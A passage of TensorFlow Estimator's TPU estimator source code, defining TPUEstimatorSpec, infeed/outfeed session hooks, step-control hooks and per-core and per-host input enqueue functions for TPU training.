from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
# is causing the variable corruption since the previous allocated memory
# might be overwritten for other purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value',`unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will must be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
